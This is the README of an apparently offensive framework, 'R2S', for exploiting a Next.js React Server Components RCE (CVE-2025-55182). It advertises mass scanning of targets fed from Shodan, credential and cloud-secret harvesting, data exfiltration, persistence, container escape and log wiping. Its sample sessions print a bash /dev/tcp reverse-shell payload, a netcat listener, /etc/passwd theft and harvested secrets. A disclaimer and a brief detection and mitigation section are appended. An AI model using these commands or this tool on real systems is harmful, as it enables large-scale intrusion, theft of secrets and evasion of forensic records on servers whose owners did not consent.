Advanced Post-Exploitation Framework for Next.js React Server Components RCE
Features β’ Installation β’ Usage β’ Commands β’ Examples
R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulnerability (CVE-2025-55182). It provides an interactive shell with advanced features for penetration testing, including file transfer, persistence, enumeration, privilege escalation checks, and more.
- β Automated vulnerability scanning - Mass scan multiple targets
- β Interactive RCE shell - Stateful command execution with directory navigation
- β HTTP-based file transfer - Upload/download files without base64 limitations
- β Reverse shell automation - Try 25+ different reverse shell payloads
- β Advanced enumeration - System, network, container, and cloud metadata
- β Privilege escalation - Automated privesc vector detection
- β Credential harvesting - Extract passwords, keys, tokens, and secrets
- β Persistence mechanisms - Maintain access across reboots
- β Lateral movement - Discover and pivot to other hosts
- β Container escape - Check for Docker/Kubernetes breakout vectors
- β Data exfiltration - Extract sensitive files and configurations
- β Stealth operations - Clear logs and hide tracks
- Mass scanning with multi-threading support
- Pipeline mode for integration with other tools
- Automatic vulnerability detection for Next.js RSC
- Stateful interactive shell with persistent working directory
- HTTP-based upload - Transfer files to target via wget/curl
- HTTP-based download - Exfiltrate files via POST requests
- No size limitations - Works with large files (unlike base64 methods)
- Automatic HTTP server - Starts/stops as needed
- System enumeration - OS, kernel, users, processes
- Network discovery - Interfaces, routes, ARP, DNS, listening ports
- Container detection - Docker, Kubernetes, LXC identification
- Cloud metadata - AWS, GCP, Azure credential extraction
- Process memory dumping - Extract secrets from running processes
- Interesting file discovery - SUID, writable dirs, backups, configs
- Environment variables (passwords, API keys, tokens)
.envfiles and configuration files- SSH private keys and authorized_keys
- Bash history with sensitive commands
- Database files (SQLite, MySQL dumps)
- Cloud credentials (AWS, Azure, GCP)
- Git credentials and NPM tokens
- Browser data (cookies, login data)
- Docker and Kubernetes secrets
- SUID/SGID binaries detection
- Sudo permissions enumeration
- Writable system files (/etc/passwd, /etc/shadow)
- Docker socket access checks
- Linux capabilities analysis
- Kernel exploit suggestions
- Cron job enumeration
- PATH hijacking opportunities
- Persistence mechanisms - Cron jobs, .bashrc, systemd services
- Advanced persistence - LD_PRELOAD, systemd timers
- Port scanning - Internal network reconnaissance
- Lateral movement - SSH key discovery, known_hosts analysis
- Container escape - Privileged container checks, capability analysis
- Data exfiltration - Automated sensitive data collection
- Reverse shell automation - 25+ payload types with auto-retry
- Log clearing - Bash history, auth logs, syslog
- Track covering - wtmp, lastlog cleanup
- Session management - Save and resume sessions
# Python 3.6 or higher
python3 --version
# Install dependencies
pip3 install requests urllib3# Clone or download the tool
cd r2s-main
# Make executable (optional)
chmod +x r2s_enhanced.py
# Run the tool
python3 r2s_enhanced.py -hpython3 r2s_enhanced.py [OPTIONS]| Option | Description | Default |
|---|---|---|
-u, --url |
Single target URL | - |
-l, --list |
File containing list of URLs | - |
-c, --cmd |
Initial command to execute | id |
-t, --threads |
Number of scanning threads | 30 |
-p, --proxy |
HTTP proxy (e.g., http://127.0.0.1:8080) |
- |
-v, --verbose |
Enable verbose output | False |
--http-port |
HTTP server port for file transfer | 8000 |
python3 r2s_enhanced.py -u http://target.compython3 r2s_enhanced.py -l targets.txt -t 50cat targets.txt | python3 r2s_enhanced.py
shodan search "Next.js" | python3 r2s_enhanced.py
subfinder -d example.com | httpx | python3 r2s_enhanced.pyOnce you gain RCE access, you'll enter an interactive shell with these commands:
upload <local_file> <remote_path> # Upload file to target
download <remote_file> <local_path> # Download file from targetcd <directory> # Change working directory
pwd # Print working directoryenum # Complete system enumeration
privesc # Privilege escalation checks
harvest # Credential harvesting
portscan <ip> # Scan internal network ports
memdump [pid] # Dump process memory for secretslateral # Lateral movement opportunities
escape # Container escape vectors
exfil [type] # Exfiltrate data (env/config/keys/db/logs/all)
reverse <lhost> <lport> # Try multiple reverse shell payloadspersist # Add basic persistence
advpersist # Add advanced persistencestealth # Clear logs and hide trackssave # Save current session
help, ? # Show help message
exit, quit # Exit interactive shellExecute any shell command directly:
whoami
id
uname -a
ps aux
netstat -tulpn
cat /etc/passwd$ python3 r2s_enhanced.py -u http://vulnerable-app.com
_ __ __ ____
/ | / /__ _ __/ /_/ __ \________
/ |/ / _ \| |/_/ __/ /_/ / ___/ _ \
/ /| / __/> </_ _/ _, _/ /__/ __/
/_/ |_/\___/_/|_|\__/_/ |_|\___/\___/
Next.js RSC Exploit Tool (CVE-2025-55182)
Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
>> CREDIT( G4rxd )
[*] Loaded 1 targets. Starting scan with 30 threads...
[*] Payload Command: id
[VULN] http://vulnerable-app.com >>> RCE SUCCESS
Output: uid=1000(node) gid=1000(node) groups=1000(node)
[+] Stateful Interactive RCE shell started. Type 'help' for commands.
[*] Advanced features: enum, privesc, persist, portscan, harvest, stealth
[*] New features: memdump, lateral, escape, exfil, advpersist, reverse
[+] HTTP server started on 192.168.1.100:8000
next-rce:/app$next-rce:/app$ enum
[*] Starting automated enumeration...
============================================================
[*] System Info
============================================================
Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="22.04.3 LTS (Jammy Jellyfish)"
============================================================
[*] Current User
============================================================
node
uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)
============================================================
[*] Container Detection
============================================================
12:devices:/docker/a1b2c3d4e5f6
11:cpuset:/docker/a1b2c3d4e5f6
[Docker container detected]
...# Upload a file
next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
[*] Uploading /tmp/exploit.sh (2048 bytes) via HTTP...
[+] Upload successful!
-rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh
# Download a file
next-rce:/app$ download /etc/passwd ./passwd.txt
[*] Downloading /etc/passwd via HTTP...
[+] Download successful! (1523 bytes)
Saved to: ./passwd.txtnext-rce:/app$ harvest
[*] Harvesting credentials...
[*] Environment Variables:
DATABASE_PASSWORD=super_secret_pass
API_KEY=sk-1234567890abcdef
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[*] .env Files:
/app/.env
/app/.env.production
/var/www/.env.local
[*] SSH Keys:
/home/node/.ssh/id_rsa
/root/.ssh/id_rsa
...next-rce:/app$ reverse 192.168.1.100 4444
[*] Starting reverse shell attempts to 192.168.1.100:4444
[!] Make sure you have a listener running: nc -lvnp 4444
[*] Trying 25 different reverse shell payloads...
[1/25] Trying Bash TCP... β Executed
[?] Did you receive a connection? (y/n/s to stop): y
[+] SUCCESS! Reverse shell established using: Bash TCP
[*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1$ cat targets.txt
http://app1.example.com
http://app2.example.com
http://app3.example.com
$ python3 r2s_enhanced.py -l targets.txt -t 50
[*] Loaded 3 targets. Starting scan with 50 threads...
[VULN] http://app1.example.com >>> RCE SUCCESS
[VULN] http://app3.example.com >>> RCE SUCCESS
[*] Scan completed.next-rce:/app$ privesc
[*] Checking privilege escalation vectors...
[*] SUID Binaries:
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
[*] Sudo Permissions:
User node may run the following commands:
(ALL : ALL) NOPASSWD: /usr/bin/docker
[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
[*] Docker Group:
In docker group - EXPLOITABLE!
...next-rce:/app$ escape
[*] Checking container escape vectors...
[*] Container Type:
12:devices:/docker/a1b2c3d4e5f6
[*] Privileged Container:
PRIVILEGED
[*] Docker Socket:
srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
[*] Capabilities:
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
[Full capabilities - container is privileged]
...The tool includes 25+ reverse shell payloads across multiple languages and techniques:
- Bash (TCP, UDP, exec variants)
- Netcat (traditional, mkfifo, OpenBSD)
- Python/Python3 (socket, pty)
- Perl (multiple variants)
- PHP (exec, system, passthru)
- Ruby (socket variants)
- Node.js (child_process, socket)
- Socat, Telnet, AWK
- Golang, OpenSSL
Automatically detects and extracts credentials from:
- AWS - IAM roles, security credentials
- GCP - Service account tokens
- Azure - Instance metadata
- Environment variables with cloud credentials
Identifies and analyzes:
- Docker containers
- Kubernetes pods
- LXC containers
- Privileged vs unprivileged
- Available escape vectors
FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY
This tool is provided for educational purposes and authorized penetration testing only. Usage of this tool for attacking targets without prior mutual consent is illegal. The author is not responsible for any misuse or damage caused by this tool.
Requirements for legal use:
- β Written authorization from the target owner
- β Defined scope and rules of engagement
- β Professional penetration testing engagement
- β Unauthorized access to systems
- β Malicious intent or damage
Detection:
- Monitor for unusual
Next-Actionheaders - Look for multipart/form-data POST requests to non-existent endpoints
- Check for base64-encoded command output in error responses
- Monitor for
child_process.execSyncin Next.js logs
Mitigation:
- Update Next.js to the latest patched version
- Implement Web Application Firewall (WAF) rules
- Restrict server-side code execution
- Monitor and log all RSC requests
- Implement proper input validation
- β Added reverse shell automation (25+ payloads)
- β Added memory dumping capabilities
- β Added lateral movement discovery
- β Added container escape checks
- β Added data exfiltration automation
- β Added advanced persistence mechanisms
- β Improved HTTP file transfer
- β Enhanced enumeration features
- β Better error handling and UX
- β HTTP-based file transfer
- β Persistence mechanisms
- β Port scanner
- β Privilege escalation checks
- β Network enumeration
- β Credential harvesting
- β Session management
- β Automated enumeration
- β Stealth features
- Stateful shell with directory navigation
- Basic file transfer (base64)
- Improved error handling
Contributions are welcome! Please ensure all contributions are for educational and defensive security purposes.
G4rxd
- CVE-2025-55182 Discovery Team
- Next.js Security Research Community
- Open Source Security Tools Community
This project is licensed for educational and authorized testing purposes only.
β‘ Happy Ethical Hacking! β‘
Remember: With great power comes great responsibility.